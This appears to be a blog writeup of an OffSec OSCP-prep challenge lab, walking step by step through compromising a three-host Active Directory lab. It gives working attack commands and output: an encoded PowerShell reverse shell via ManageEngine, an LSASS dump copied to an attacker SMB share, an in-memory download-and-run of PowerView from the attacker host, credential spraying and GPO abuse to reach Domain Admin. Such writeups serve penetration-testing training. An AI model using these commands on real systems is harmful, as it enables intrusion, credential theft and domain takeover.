Giuslock Pages grep

OSCP Preparation - CHALLENGE_0 Secura - Writeup

8 min read topic:ctf, offsec, OSCP

Challenge 0 — OffSec Writeup

Date: 2026-04-10
Lab: OffSec Challenge Lab 0 (OSCP prep)
Forest: secura.yzx
Targets: 192.168.224.95 (SECURE), 192.168.224.96 (ERA), 192.168.224.97 (DC01)
Difficulty: Easy/Medium
OS: Windows 10 + Windows Server (AD DS)

Table of Contents

Reconnaissance

Host discovery on the in-scope /24:

nmap -sn 192.168.224.0/24

Three live hosts (+ gateway):

  • 192.168.224.95 — Windows 10, domain-joined (SECURE.secura.yzx)
  • 192.168.224.96 — Windows Server (ERA)
  • 192.168.224.97 — Windows Server 2016, AD DS (DC01.secura.yzx)

Service enumeration on SECURE:

nmap -p- --min-rate 2000 192.168.224.95
nmap -sVC -p 5001,8443,12000,44444 192.168.224.95

Key finding: ManageEngine Applications Manager listening on 8443/tcp (HTTPS), build 14710 Free Edition.

Foothold — ManageEngine Default Creds + Script Monitor RCE

1. Default Credentials

Browsing to https://192.168.224.95:8443/ exposes the AppManager login page. Default credentials work out of the box:

admin : admin

The About page confirms build 14710 (Free Edition), installation path C:\Program Files\ManageEngine\AppManager14, PostgreSQL backend.

2. Script Monitor Abuse

AppManager has a native Script Monitor feature that lets admins run arbitrary commands on the monitoring host. Since the AppManager service runs as LocalSystem, any command executed through this feature inherits SYSTEM privileges.

New Monitor → Script Monitor configuration:

Script Location:      Local Server
Script Type:          Command
Script / Command:     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Execution Directory:  C:\Windows\Temp
Arguments:            -nop -w hidden -enc <base64 UTF-16LE reverse shell>

3. Reverse Shell as SYSTEM

nc -lvnp 9001

Triggering "Poll Now" on the newly created monitor:

listening on [any] 9001 ...
connect to [192.168.45.230] from (UNKNOWN) [192.168.224.95] 61570
PS C:\Windows\Temp> whoami
nt authority\system

4. First Flag

PS> type C:\Users\Administrator\Desktop\proof.txt
[REDACTED]

SECURE proof.txt obtained. No local.txt present — foothold went straight to SYSTEM, bypassing any low-priv user context.

Credential Harvesting — LSASS Dump via comsvcs.dll

As SYSTEM, LSASS is dumpable via the Windows LOLBIN comsvcs.dll (built-in, signed, not flagged by Defender).

5. Dump LSASS

PS> Get-Process lsass | Select-Object Id
  Id
  --
 684

PS> rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 684 C:\Windows\Temp\lsass.dmp full
PS> dir C:\Windows\Temp\lsass.dmp
-a----  4/10/2026  3:40 PM  54642962  lsass.dmp

6. Exfiltration via impacket-smbserver

# Kali
mkdir /tmp/share && cd /tmp/share
impacket-smbserver -smb2support share .
# SECURE
copy C:\Windows\Temp\lsass.dmp \\192.168.45.230\share\

7. Offline Parsing with pypykatz

pypykatz lsa minidump lsass.dmp

Extracted credentials:

  • SECURE\Administrator NT hash
  • SECURE$ machine account NT + Kerberos AES256 keys
  • Credential Manager entry: apache : [REDACTED] (target label era.secura.local)

The CredMan entry is the "plaintext password via RCE" announced by the lab. The target label era.secura.local is just a textual hint pointing at the box named ERA.

Lateral Movement — SECURE → ERA

8. Auth Scoping

# Domain auth fails
netexec smb 192.168.224.96 -u apache -p '[REDACTED]'
# STATUS_LOGON_FAILURE (secura.yzx\apache)

# Local auth succeeds
netexec smb   192.168.224.96 -u apache -p '[REDACTED]' --local-auth
# [+] ERA\apache
netexec winrm 192.168.224.96 -u apache -p '[REDACTED]' --local-auth
# [+] ERA\apache (Pwn3d!)

apache is a local account on ERA with WinRM access (via BUILTIN\Remote Management Users).

9. Interactive Shell

evil-winrm -i 192.168.224.96 -u apache -p '[REDACTED]'

whoami /all reveals low-priv context: Medium IL, no SeImpersonate / SeDebug / SeAssignPrimaryToken. The Pwn3d! label from netexec only means WinRM admin access — not real local admin. No Potato family applicable.

Privilege Escalation — apache → administrator on ERA

10. Service Inventory

Get-Process | Where-Object { $_.ProcessName -match 'mysql|httpd|xampp' }

ERA has a full XAMPP installation at C:\xampp\:

  • MariaDB mysqld running on 0.0.0.0:3306
  • Apache not running, htdocs empty

MariaDB from Kali fails with ERROR 1130 Host not allowed to connect (grant host filter). Access must come from a local client.

11. MariaDB Access via XAMPP Default Creds

Using the local C:\xampp\mysql\bin\mysql.exe client from the WinRM shell:

apache : [REDACTED] → denied
root   : (blank)    → ✅

XAMPP's default root account has no password.

12. Credential Dump from creds.creds

SHOW DATABASES;
-- creds, information_schema, mysql, performance_schema, phpmyadmin, test

USE creds; SELECT * FROM creds;
+---------------+-----------------+
| name          | pass            |
+---------------+-----------------+
| administrator | [REDACTED]      |
| charlotte     | [REDACTED]      |
+---------------+-----------------+

13. Credential Spraying

Parallel spray via bash background jobs against SECURE, ERA, DC01 on SMB/WinRM/LDAP. Results saved to Evidence/Scans/AD Enumeration/spray_results.txt:

  • ERA\administrator : [REDACTED] → local admin on ERA (SMB [+], WinRM [+] Pwn3d!)
  • secura.yzx\charlotte : [REDACTED] → valid domain user, WinRM Pwn3d! on DC01
  • administrator → fails on SECURE and on the domain
  • charlotte → not a local user anywhere

14. ERA Flags

evil-winrm -i 192.168.224.96 -u administrator -p '[REDACTED]'
PS> type C:\Users\Administrator\Desktop\proof.txt
[REDACTED]
PS> type C:\Users\apache\Desktop\local.txt
[REDACTED]

ERA proof.txt and local.txt obtained. Note: local.txt lives in the domain user apache profile (C:\Users\apache\), not the local apache.ERA profile — confirming two different SIDs with the same sAMAccountName.

Lateral Movement — ERA → DC01

15. WinRM as charlotte

evil-winrm -i 192.168.224.97 -u charlotte -p '[REDACTED]'
User:  secura\charlotte
Groups: BUILTIN\Remote Management Users, BUILTIN\Pre-Windows 2000 Compatible Access
Privs:  SeMachineAccountPrivilege, SeImpersonatePrivilege
IL:     High

charlotte has WinRM access to the DC and SeImpersonatePrivilege, but is not a member of Administrators yet — initially only a domain user with RemoteShell rights.

16. DC Local Flag

PS> type C:\Users\charlotte\Desktop\local.txt
[REDACTED]

DC01 local.txt obtained. C:\Users\Administrator\Desktop\proof.txt is access denied — privilege escalation required.

Privilege Escalation — charlotte → Domain Admin via GPO Abuse

17. GPO Enumeration with PowerView

PowerView loaded in-memory over HTTP from the Kali attacker:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.45.230/PowerView.ps1')

Get-DomainGPO | ForEach-Object {
    Get-DomainObjectAcl -ResolveGUIDs -Identity $_.Name |
      Where-Object { $_.SecurityIdentifier -match 'S-1-5-21-.*-1104' }
}

Result: the Default Domain Policy (GUID {31B2F340-016D-11D2-945F-00C04FB984F9}) has an explicit ACE granting charlotte (SID ...-1104) the rights WriteDacl, WriteOwner, WriteProperty, GenericExecute.

This is the misconfiguration: Default Domain Policy is linked to the domain root, which means it applies to the DC itself — any code injected into this GPO runs as SYSTEM on the DC at next gpupdate.

18. Failed SharpGPOAbuse Attempts

First tried --AddComputerTask (immediate scheduled task injection):

.\SharpGPOAbuse.exe --AddComputerTask `
  --TaskName "Update" `
  --Author "secura.yzx\Administrator" `
  --Command "cmd.exe" `
  --Arguments '/c net group "Domain Admins" charlotte /add /domain' `
  --GPOName "Default Domain Policy"

GPO was modified successfully, but PowerShell's argument tokenizer in WinRM stripped the inner quotes and the resulting ScheduledTasks.xml contained:

<Arguments>/c net group Domain</Arguments>

→ truncated at the space, invalid command.

Retried with -EncodedCommand <base64 UTF-16LE> to avoid quote issues:

[!] Unknown argument error.
[!] Exiting...

SharpGPOAbuse's own argument parser interprets the leading - in -EncodedCommand (inside the Arguments value) as a new CLI flag. Dead end.

19. --AddLocalAdmin (Clean Approach)

Pivot to the cleaner mode: add charlotte to Restricted Groups → BUILTIN\Administrators. No shell-quoting, no encoding.

.\SharpGPOAbuse.exe --AddLocalAdmin `
  --UserAccount charlotte `
  --GPOName "Default Domain Policy"
[+] SID Value of charlotte = S-1-5-21-3453094141-4163309614-2941200192-1104
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\secura.yzx\SysVol\secura.yzx\Policies\{31B2F340-...}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.

SharpGPOAbuse patched GptTmpl.inf in SysVol adding charlotte to the [Group Membership] section as a member of *S-1-5-32-544 (BUILTIN\Administrators).

20. Force Policy Refresh

gpupdate /force
# Computer Policy update has completed successfully.
# User Policy update has completed successfully.

Key insight: on a Domain Controller, BUILTIN\Administrators is the effective Domain Admin group (DCSync rights, NTDS.dit access, full filesystem, interactive logon). Adding a user here is equivalent to making them DA — without ever touching the Domain Admins group.

21. Re-login → Elevated Token

Disconnect and reconnect via evil-winrm to get a fresh Kerberos token with the new group membership:

evil-winrm -i 192.168.224.97 -u charlotte -p '[REDACTED]'
USER INFORMATION: secura\charlotte

GROUP INFORMATION:
  BUILTIN\Administrators                     S-1-5-32-544   (Group owner)
  BUILTIN\Remote Management Users
  BUILTIN\Pre-Windows 2000 Compatible Access
  Mandatory Label\High Mandatory Level

PRIVILEGES:
  SeDebugPrivilege, SeBackupPrivilege, SeRestorePrivilege,
  SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege,
  SeSecurityPrivilege, SeSystemEnvironmentPrivilege, SeEnableDelegationPrivilege,
  SeManageVolumePrivilege, ...

Full SYSTEM-tier privilege set on the DC.

22. Final Flag

PS C:\Users> dir
Mode   Name
----   ----
d----- Administrator.DC01      ← profile created pre-domain-join
d----- charlotte
d-r--- Public
d----- TEMP

PS C:\Users> type C:\Users\Administrator.DC01\Desktop\proof.txt
[REDACTED]

DC01 proof.txt obtained.

The profile suffix .DC01 is a forensic artifact: the Administrator profile on disk was created when the server was still standalone (hostname DC01), before being promoted to a Domain Controller. After promotion, the Administrator user became the domain account, but the legacy local profile directory retained its hostname suffix. Hence Administrator.DC01 instead of the usual Administrator.

Vulnerability Summary

# Vulnerability CVE Impact
1 ManageEngine AppManager default credentials (admin:admin) - Web console access
2 AppManager Script Monitor arbitrary command execution as LocalSystem - RCE as SYSTEM on SECURE
3 LSASS accessible to SYSTEM + cleartext CredMan storage - Recovery of apache plaintext password
4 Reused local credentials across domain-joined host - Lateral movement SECURE → ERA
5 XAMPP MariaDB default root with blank password - Local database access on ERA
6 Plaintext credential storage in application DB (creds.creds) - Discovery of administrator + charlotte creds
7 Insecure DACL on Default Domain Policy — WriteDacl granted to low-priv user - GPO-based privilege escalation to Domain Admin
8 GPO Restricted Groups abuse via SharpGPOAbuse - Persistence as BUILTIN\Administrators on DC

Kill Chain

 secura.yzx forest
    │
    ├─[1] SECURE (.95) Win10 domain-joined
    │       └─ ManageEngine AppManager 8443default creds admin:admin
    │            └─ Script Monitor (PowerShell -enc) → reverse shell as SYSTEM
    │                 ├─ proof.txt  [REDACTED]
    │                 └─ LSASS dump (comsvcs.dll MiniDump) → pypykatz
    │                      ├─ SECURE\Admin NT hash
    │                      └─ ⭐ CredMan: apache : [REDACTED]
    │
    ├─[2] ERA (.96) XAMPP + MariaDB
    │       └─ netexec --local-auth apache → WinRM (low-priv)
    │            └─ MariaDB: XAMPP root blank password
    │                 └─ Dump creds.creds
    │                      ├─ administrator : [REDACTED] → local admin ERA
    │                      │     ├─ proof.txt  [REDACTED]
    │                      │     └─ local.txt  [REDACTED]
    │                      └─ ⭐ charlotte    : [REDACTED] → domain user + WinRM on DC
    │
    └─[3] DC01 (.97) secura.yzx Domain Controller
            └─ WinRM as charlotte (BUILTIN\Remote Management Users)
                 ├─ local.txt [REDACTED]
                 └─ PowerView → WriteDacl on Default Domain Policy granted to charlotte
                      └─ SharpGPOAbuse --AddLocalAdmin → GptTmpl.inf Restricted Groups
                           └─ gpupdate /force → BUILTIN\Administrators on DC
                                └─ proof.txt [REDACTED]  ☠️ DOMAIN ADMIN
© 2026 Giuslock —